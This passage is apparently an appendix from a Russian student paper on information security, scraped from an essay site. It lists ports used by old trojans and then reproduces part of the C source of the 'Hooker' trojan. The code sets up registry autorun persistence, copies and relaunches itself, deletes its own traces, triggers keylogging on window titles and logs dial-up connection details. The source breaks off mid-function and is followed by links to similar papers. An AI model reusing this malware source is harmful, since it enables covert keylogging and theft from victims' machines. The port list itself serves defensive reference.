port 1010 - Doly Trojan port 1011 - Doly Trojan port 1255 - Scarab
port 1256 - Project nEXT port 1269 - Mavericks Matrix
port 1313 - NETrojan port 1338 - Millenium Worm
port 1349 (UDP) - BO DLL port 1492 - FTP99CMP
port 1509 - Psyber Streaming Server port 1524 - Trinoo
port 1600 - Shivka-Burka port 1777 - Scarab
port 1807 - SpySender port 1966 - Fake FTP
port 1969 - OpC BO port 1981 - Shockrave
port 1999 - BackDoor, TransScout port 1012 - Doly Trojan
port 1015 - Doly Trojan port 1016 - Doly Trojan
port 1020 - Vampire port 1024 - NetSpy
port 1042 - Bla port 1045 - Rasmin
port 1050 - MiniCommand port 1080 - WinHole
port 1081 - WinHole port 1082 - WinHole
port 1083 - WinHole port 1090 - Xtreme
port 1095 - RAT port 1097 - RAT
port 1098 - RAT port 1099 - BFevolution, RAT
port 1170 - Psyber Stream Server, Streaming Audio trojan, Voice
port 1200 (UDP) - NoBackO port 1201 (UDP) - NoBackO
port 1207 - SoftWAR port 1212 - Kaos
port 1225 - Scarab port 1234 - Ultors Trojan
port 1243 - BackDoor-G, SubSeven, SubSeven Apocalypse, Tiles
port 1245 - VooDoo Doll
port 2000 - Der Spaeher 3, Insane Network, TransScout
port 2001 - Der Spaeher 3, TransScout, Trojan Cow
port 2002 - TransScout port 2003 - TransScout
port 2004 - TransScout port 2005 - TransScout
port 2023 - Ripper port 2080 - WinHole
port 2115 - Bugs port 2140 - Deep Throat, The Invasor
port 2155 - Illusion Mailer port 2283 - HVL Rat5
port 2300 - Xplorer port 2565 - Striker
port 2583 - WinCrash port 2600 - Digital RootBeer
port 2716 - The Prayer port 2773 - SubSeven
port 2801 - Phineas Phucker port 3000 - Remote Shutdown
port 3024 - WinCrash port 3128 - RingZero
port 3129 - Masters Paradise port 3150 - Deep Throat, The Invasor
port 3456 - Teror Trojan port 3459 - Eclipse 2000, Sanctuary
port 3700 - Portal of Doom port 3791 - Eclypse
port 3801 (UDP) - Eclypse port 4000 - Skydance
port 4092 - WinCrash port 4242 - Virtual hacking Machine
port 4321 - BoBo port 4444 - Prosiak, Swift remote
port 4567 - File Nail port 4590 - ICQTrojan
port 5000 - Bubbel, Back Door Setup, Sockets de Troie port 5001 - Back Door Setup, Sockets de Troie
port 5010 - Solo port 5011 - One of the Last Trojans (OOTLT)
port 5031 - NetMetropolitan port 5031 - NetMetropolitan
port 5321 - Firehotcker port 5343 - wCrat
port 5400 - Blade Runner, Back Construction port 5401 - Blade Runner, Back Construction
port 5402 - Blade Runner, Back Construction port 5550 - Xtcp
port 5512 - Illusion Mailer port 5555 - ServeMe
port 5556 - BO Facil port 5557 - BO Facil
port 5569 - Robo-Hack port 5637 - PC Crasher
port 5638 - PC Crasher port 5742 - WinCrash
port 5882 (UDP) - Y3K RAT port 5888 - Y3K RAT
port 6000 - The Thing port 6006 - The Thing
port 6272 - Secret Service port 6400 - The Thing
port 6667 - Schedule Agent port 6669 - Host Control, Vampyre
port 6670 - DeepThroat, BackWeb Server, WinNuke eXtreame
port 6711 - SubSeven port 6712 - Funny Trojan, SubSeven
port 6713 - SubSeven port 6723 - Mstream
port 6771 - DeepThroat port 6776 - 2000 Cracks, BackDoor-G, SubSeven
port 6838 (UDP) - Mstream port 6912 - Shit Heep (not port 69123!)
port 6939 - Indoctrination
port 6969 - GateCrasher, Priority, IRC 3, NetController port 6970 - GateCrasher
port 7000 - Remote Grab, Kazimas, SubSeven port 7001 - Freak88
port 7215 - SubSeven port 7300 - NetMonitor
port 7301 - NetMonitor port 7306 - NetMonitor
port 7307 - NetMonitor port 7308 - NetMonitor
port 7424 - Host Control port 7424 (UDP) - Host Control
port 7789 - Back Door Setup, ICKiller port 7983 - Mstream
port 8080 - RingZero port 8787 - Back Orifice 2000
port 8897 - HackOffice port 8988 - BacHack
port 8989 - Rcon port 9000 - Netministrator
port 9325 (UDP) - Mstream port 9400 - InCommand
port 9872 - Portal of Doom port 9873 - Portal of Doom
port 9874 - Portal of Doom port 9875 - Portal of Doom
port 9876 - Cyber Attacker, RUX port 9878 - TransScout
port 9989 - iNi-Killer port 9999 - The Prayer
port 10067 (UDP) - Portal of Doom port 10085 - Syphillis
port 10086 - Syphillis port 10101 - BrainSpy
port 10167 (UDP) - Portal of Doom port 10528 - Host Control
port 10520 - Acid Shivers port 10607 - Coma
port 10666 (UDP) - Ambush port 11000 - Senna Spy
port 11050 - Host Control port 11051 - Host Control
port 11223 - Progenic trojan, Secret Agent port 12076 - Gjamer
port 12223 - Hack+99 KeyLogger
port 12345 - GabanBus, My Pics, NetBus, Pie Bill Gates, Whack Job, X-bill
port 12346 - GabanBus, NetBus, X-bill port 12349 - BioNet
port 12361 - Whack-a-mole port 12362 - Whack-a-mole
port 12623 (UDP) - DUN Control port 12624 - Buttman
port 12631 - WhackJob port 12754 - Mstream
port 13000 - Senna Spy port 13010 - Hacker Brazil
port 15092 - Host Control port 15104 - Mstream
port 16660 - Stacheldracht port 16484 - Mosucker
port 16772 - ICQ Revenge port 16969 - Priority
port 17166 - Mosaic port 17300 - Kuang2 The Virus
port 17777 - Nephron port 18753 (UDP) - Shaft
port 19864 - ICQ Revenge port 20001 - Millennium
port 20002 - AcidkoR port 20034 - NetBus 2 Pro, NetRex, Whack Job
port 20203 - Chupacabra port 20331 - Bla
port 20432 - Shaft port 20432 (UDP) - Shaft
port 21544 - GirlFriend, Kidterror, Schwindler, WinSp00fer port 22222 - Prosiak
port 23023 - Logged port 23432 - Asylum
port 23456 - Evil FTP, Ugly FTP, Whack Job port 23476 - Donald Dick
port 23476 (UDP) - Donald Dick port 23477 - Donald Dick
port 26274 (UDP) - Delta Source port 26681 - Spy Voice
port 27374 - SubSeven port 27444 (UDP) - Trinoo
port 27573 - SubSeven port 27665 - Trinoo
port 29104 - Host Control port 29891 (UDP) - The Unexplained
port 30001 - TerrOr32 port 30029 - AOL Trojan
port 30100 - NetSphere port 30101 - NetSphere
port 30102 - NetSphere port 30103 - NetSphere
port 30103 (UDP) - NetSphere port 30133 - NetSphere
port 30303 - Sockets de Troie port 30947 - Intruse
port 30999 - Kuang2 port 31335 (UDP) - Trinoo
port 31336 - Bo Whack, ButtFunnel port 31337 - Baron Night, BO client, BO2, Bo Facil
port 31337 (UDP) - BackFire, Back Orifice, DeepBO, Freak>
port 31338 - NetSpy DK, ButtFunnel port 31338 (UDP) - Back Orifice, DeepBO
port 31339 - NetSpy DK port 31666 - BOWhack
port 31785 - Hack+a+Tack port 31787 - Hack+a+Tack
port 31788 - Hack+a+Tack port 31789 (UDP) - Hack+a+Tack
port 31791 (UDP) - Hack+a+Tack port 31792 - Hack+a+Tack
port 32100 - Peanut Brittle, Project nEXT port 32418 - Acid Battery
port 33333 - Blakharaz, Prosiak port 33577 - PsychWard
port 33777 - PsychWard port 33911 - Spirit 2001a
port 34324 - BigGluck, TN port 34555 (UDP) - Trinoo (Windows)
port 35555 (UDP) - Trinoo (Windows) port 37651 - YAT
port 40412 - The Spy port 40421 - Agent 40421, Masters Paradise
port 40422 - Masters Paradise port 40423 - Masters Paradise
port 40426 - Masters Paradise port 41666 - Remote Boot
port 41666 (UDP) - Remote Boot port 44444 - Prosiak
port 47262 (UDP) - Delta Source port 50505 - Sockets de Troie
port 50766 - Fore, Schwindler port 51996 - Cafeini
port 52317 - Acid Battery 2000 port 53001 - Remote Windows Shutdown
port 54283 - SubSeven port 54320 - Back Orifice 2000
port 54321 - School Bus port 54321 (UDP) - Back Orifice 2000
port 57341 - NetRaider port 58339 - ButtFunnel
port 60000 - Deep Throat port 60068 - Xzip 6000068
port 60411 - Connection port 61348 - Bunker-Hill
port 61466 - Telecommando port 61603 - Bunker-Hill
port 63485 - Bunker-Hill port 65000 - Devil, Stacheldracht
port 65432 - The Traitor port 65432 (UDP) - The Traitor
port 65535 - RC
ПРИЛОЖЕНИЕ 2
Исходный текст троянца Нооker
#include "hooker. h"
#include "logfunc. h"
#include "common. h"
#include "lzw. h"
// ------------ - путь в реестре---------------------
HKEY GetRegKey (const char* s,char* r)
{
const char* szRoots [] = {
"HKEY_CLASSES_ROOT",
"HKEY_CURRENT_USER",
"HKEY_LOCAL_MACHINE",
"HKEY_USERS"};
const HKEY hKeys [] = {
HKEY_CLASSES_ROOT,
HKEY_CURRENT_USER,
HKEY_LOCAL_MACHINE,
HKEY_USERS};
int i;
for (i=0; i<4; i++)
if (! strncmp (s, szRoots [i], strlen (szRoots [i]))) {
strcpy (r, s + strlen (szRoots [i]) + 1);
return hKeys [i];
};
return NULL;
};
// --------------Повторный запуск программы при необходимости--------------
void RecurrentStart (void)
{
char *szCmd,sz1 [0x100],sz2 [0x100];
PROCESS_INFORMATION pi;
STARTUPINFO si;
szCmd = GetCommandLine ();
sprintf (sz1,"Restart_%X",sti. number);
if (! strstr (szCmd,sz1)) {
// Это первая копия процесса, сделать вторую
memset (&si,0,sizeof (si));
si. cb = sizeof (si);
GetModuleFileName (NULL,sz2,sizeof (sz2));
// Создаем процесс
CreateProcess (
sz2, // pointer to name of executable module
sz1, // pointer to command line string
NULL, // pointer to process security attributes
NULL, // pointer to thread security attributes
false, // handle inheritance flag
0, // creation flags
NULL, // pointer to new environment block
NULL, // pointer to current directory name
&si, // pointer to STARTUPINFO
&pi // pointer to PROCESS_INFORMATION
);
ExitProcess (0);
};
};
// ----------------------------Деинсталяция----------------------------
void AutoKill (HINSTANCE h_keylog)
{
HKEY hKey,hRoot;
char sz1 [0x100];
EnterCriticalSection (&gcs);
// вход реестре
hRoot = GetRegKey (sti. reg_path,sz1);
if (hRoot) {
RegOpenKeyEx (
hKey, // handle of open key
sz1, // address of name of subkey to open
0, // reserved
KEY_ALL_ACCESS, // security access mask
&hKey // address of handle of open key
);
RegDeleteValue (hKey,sti. reg_desc);
RegCloseKey (hKey);
};
// Удаляем лог
DeleteFile (sti. logname);
// Удаляем keylog dll
GetModuleFileName (h_keylog,sz1,sizeof (sz1));
FreeLibrary (h_keylog);
DeleteFile (sz1);
// Adieu!
ExitProcess (0);
};
// ----------------------Установка в реестре---------------------------
void RegInstall (void)
{
HKEY hKey,hRoot;
ULONG i,j;
char buf1 [0x100],buf2 [0x100];
hRoot = GetRegKey (sti. reg_path,buf1);
if (! hRoot) hRoot = HKEY_LOCAL_MACHINE;
if (RegCreateKeyEx (
hRoot, // handle of an open key
buf1, // address of subkey name
0, // reserved
"", // address of class string
REG_OPTION_NON_VOLATILE, // special options flag
KEY_ALL_ACCESS, // desired security access
NULL, // address of key security structure
&hKey, // address of buffer for opened handle
&i // address of disposition value buffer
) ! = ERROR_SUCCESS) return;
i = sizeof (buf1);
if (sti. fullname)
strcpy (buf2,sti. full_exe_name);
else
strcpy (buf2,sti. exe_name);
if ( (RegQueryValueEx (
hKey, // handle of key to query
sti. reg_desc, // address of name of value to query
NULL, // reserved
&j, // address of buffer for value type
(UCHAR*) buf1, // address of data buffer
&i // address of data buffer size
) ! = ERROR_SUCCESS) ||
(j! = REG_SZ) ||
(strcmp (buf1,buf2))) {
// Надо ставить свой ключ
RegSetValueEx (
hKey, // handle of key to set value for
sti. reg_desc, // address of value to set
0, // reserved
REG_SZ, // flag for value type
(UCHAR*) buf2, // address of value data
strlen (buf2) + 1 // size of value data
);
};
RegCloseKey (hKey);
};
// -----------------------Инсталяция в систему-------------------------
void Install (void)
{
char buf1 [0x100],buf2 [0x100];
PROCESS_INFORMATION pi;
STARTUPINFO si;
// из какого каталога запуск?
GetModuleFileName (NULL,buf1,sizeof (buf1));
CharUpperBuff (buf1,strlen (buf1));
if (strcmp (sti. full_exe_name,buf1)) { // Нет это не наш каталог
// Копируем
if (CopyFile (buf1,sti. full_exe_name,false)) { // Скопировали нормально
memset (&si,0,sizeof (si));
si. cb = sizeof (si);
sprintf (buf2,"Restart_%X Kill_%X=%s",sti. number,sti. number,buf1);
// Стартуем процесс
CreateProcess (
sti. full_exe_name, // pointer to name of executable module
buf2, // pointer to command line string
NULL, // pointer to process security attributes
NULL, // pointer to thread security attributes
false, // handle inheritance flag
0, // creation flags
NULL, // pointer to new environment block
NULL, // pointer to current directory name
&si, // pointer to STARTUPINFO
&pi // pointer to PROCESS_INFORMATION
);
};
ExitProcess (0);
};
};
// --------------------Проверка на включение кейлога-------------------
bool TitleTest (HWND hwnd, char* t)
{
char title [0x200];
UINT i;
GetWindowText (hwnd,title,sizeof (title)); // Считываем заголовок окна
strcpy (t,title);
if (sti. total_log) return true; // Если постоянный лог
CharUpperBuff (title,strlen (title)); // в верхний региср
for (i = 0; i<sti. nsubstr; i++) // Ищем субстроки
if (strstr (title,sti. substr [i])) return true;
return false;
};
// --------Тут происходит проверка на возникновение соединения---------
void ConDectecting (void)
{
static HRASCONN hconn;
static int state;
RASCONN rascon;
RASCONNSTATUS rascs;
LPRASENTRY re;
RASPPPIP rasip;
SYSTEMTIME st;
int i,j;
char sz1 [0x1000],sz2 [0x100];
FILE* fs;
if (! bRASDLL) return;
// текущее соединение?
rascon. dwSize = sizeof (RASCONN);
j = sizeof (rascon);
if (RasEnumConnections (
&rascon, // buffer to receive connections data
(LPDWORD) &j, // size in bytes of buffer
(LPDWORD) &i // number of connections written to buffer
)) return;
if (! i) { // нет соединений
hconn = NULL;
return;
};
// на каком этапе подключение?
rascs. dwSize = sizeof (rascs);
i = RasGetConnectStatus (
rascon. hrasconn, // handle to RAS connection of interest
&rascs // buffer to receive status data
);
if ( (i) || (rascs. rasconnstate == RASCS_Disconnected)) {
hconn = NULL;
return;
};
if (hconn! = rascon. hrasconn) {
state = rascs. rasconnstate;
hconn = rascon. hrasconn;
return;
};
if ( (rascs. rasconnstate == RASCS_Connected) && (state! = RASCS_Connected)) {
state = RASCS_Connected;
// новое соединение успешно установлено
GetLocalTime (&st);
// имя, время соединения
sprintf (
sz1,"\nConnection: \"%s\",%2.2u:%2.2u:%2.2u\n",
rascon. szEntryName,
st. wHour,
st. wMinute,
st. wSecond
);
i = 0; // опередляем количество памяти под RASENTRY
RasGetEntryProperties (
NULL, // pointer to full path and filename of phone-book file
rascon. szEntryName, // pointer to an entry name
NULL, // buffer that receives entry information
(LPDWORD) &i, // size, in bytes, of the lpRasEntry buffer
NULL, // buffer that receives device-specific configuration information
NULL // size, in bytes, of the lpbDeviceInfo buffer
);
re = (LPRASENTRY) new BYTE [i];
re->dwSize = sizeof (RASENTRY);
Подобные документы
Правовые основы защиты информации на предприятии. Анализ среды пользователей. Автоматизированная система предприятия. Краткие сведения об операционной системе Windows XP. Классификация троянских программ. Способы защиты операционной системы Windows XP.
дипломная работа [187,3 K], добавлен 14.07.2013Основные угрозы по отношению к информации. Понятия, методы и способы обеспечения защиты данных. Требования к системе защиты. Механизм авторизации в информационной базе для определения типа пользователя. Работа администратора с системой безопасности.
курсовая работа [201,1 K], добавлен 24.06.2013Понятие и состав научно-методологических основ обеспечения информационной безопасности. Основные положения теории систем. Содержание принципов организации комплексной системы защиты информации, предъявляемые к ней требования и порядок работ при создании.
реферат [158,8 K], добавлен 05.11.2011Угрозы в сфере информационного обеспечения. Цели и задач и создания комплексной системы защиты информации на предприятии. Применение скрытия и уничтожения информации, дезинформации противника, легендирования. Анализ функций системы защиты предприятия.
курсовая работа [60,7 K], добавлен 23.06.2012Анализ объекта информатизации. Политику информационной безопасности. Подсистемы технической защиты информации: управления доступом, видеонаблюдения, охранной и пожарной сигнализаций, защиты от утечки по техническим каналам, защиты корпоративной сети.
презентация [226,0 K], добавлен 30.01.2012Характеристика комплекса задач и обоснование необходимости совершенствования системы обеспечения информационной безопасности и защиты информации на предприятии. Разработка проекта применения СУБД, информационной безопасности и защиты персональных данных.
дипломная работа [2,6 M], добавлен 17.11.2012Проект комплексной системы защиты информации на примере Администрации г. Миасса: объект защиты; модель бизнес-процессов с целью выявления конфиденциальной информации, "Перечень сведений конфиденциального характера", объекты защиты, угрозы, уязвимости.
курсовая работа [2,6 M], добавлен 16.04.2008Системная концепция комплексного обеспечения системы защиты информации. Описание автоматизированной системы охраны "Орион" и ее внедрение на объекте защиты. Технические каналы утечки информации. Разработка системы видеонаблюдения объекта защиты.
дипломная работа [1,2 M], добавлен 30.08.2010Актуальность и важность технической защиты информации, нормативные документы. Анализ деятельности ООО "Технология защиты", информационные потоки. Обоснование угроз по техническим каналам. Разработка системы управления информационной безопасности.
дипломная работа [771,4 K], добавлен 13.06.2012Концепция обеспечения безопасности информации в ООО "Нейрософт"; разработка системы комплексной защиты. Информационные объекты фирмы, степень их конфиденциальности, достоверности, целостности; определение источников угроз и рисков, выбор средств защиты.
курсовая работа [458,9 K], добавлен 23.05.2013